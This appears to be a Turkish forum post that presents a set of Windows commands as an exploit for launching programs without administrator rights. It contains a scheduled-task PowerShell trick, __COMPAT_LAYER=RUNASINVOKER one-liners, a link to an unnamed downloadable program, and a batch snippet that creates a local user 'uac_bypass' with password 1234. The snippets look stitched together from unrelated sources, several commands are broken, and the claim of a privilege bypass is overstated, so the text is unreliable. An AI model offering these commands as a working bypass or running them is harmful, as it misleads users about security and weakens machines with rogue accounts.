Windows'ta Bulunan Zaafiyet !

Merhabalar

Çok uzun zaman önce benim de bulmuş olduğum Admin izni almadan bir uygulama başlatmayı size göstermek istiyorum

Yetki Kontrolü İçin

PowerShell Kodu :
<#
  Run-NonEl.ps1
#>
 
function Run-NonElevated( [string] $cmd ) {
    $task_name = "Run-NonElevated-$(New-Guid)"
    schtasks /Create /RU $Env:USERNAME /TN $task_name /SC ONCE /ST 00:00 /F /TR $cmd
    schtasks /run /tn $task_name
    schtasks /delete /F /tn $task_name
}

Run-NonElevated "powershell -NoProfile -Command 'vboxmanage list runningvms | Out-File $Env:TEMP\re.out'"
cat C:\Users\majkinetor\AppData\Local\Temp\re.out
"test machine" {31409fff-c195-4a83-ab12-96bba020e051}

Program Halinde :
https://www.dosyaupload.com/argR

NOT : Ilk ikisi false olmalı

False değilse :

cls
net user /add uac_bypass 1234
new localgroup uacbypass uac_bypass  /add
runas /user:*bilgisayar_adi*\*uac_bypass uac_bypass.bat
pause

Ve açık kodu

Set ApplicationPath="C:\Program Files\Diger\test.exe"
cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "%ApplicationPath%"
cmd /min /C \"set __COMPAT_LAYER=RunAsAdmin && start \"\" \"%ApplicationPath%\"\""
cmd /min /C \"set __COMPAT_LAYER=RunAsHighest && start \"\" \"%ApplicationPath%\"\""

Bu koddaki C:\Program Files\Diger\test.exe kısmına bir program adı yazın ve o uygulama açılsın :) hiçbir admin gereksinimi duymayacaksınız.

Bknz :

I.Yöntem

cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "regedit.exe"

II.Yöntem
Set ApplicationPath="regedit.exe"
cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && start "" "%ApplicationPath%"
pause

III.Yöntem
cmd /min /C set __COMPAT_LAYER=RUNASINVOKER
start "" "regedit.exe"

ÇALIŞMIYOR :
cmd /min /C \"set __COMPAT_LAYER=RunAsAdmin && start \"\" \"regedit.exe\"\""
cmd /min /C \"set __COMPAT_LAYER=RunAsHighest && start \"\" \"regedit.exe\"\""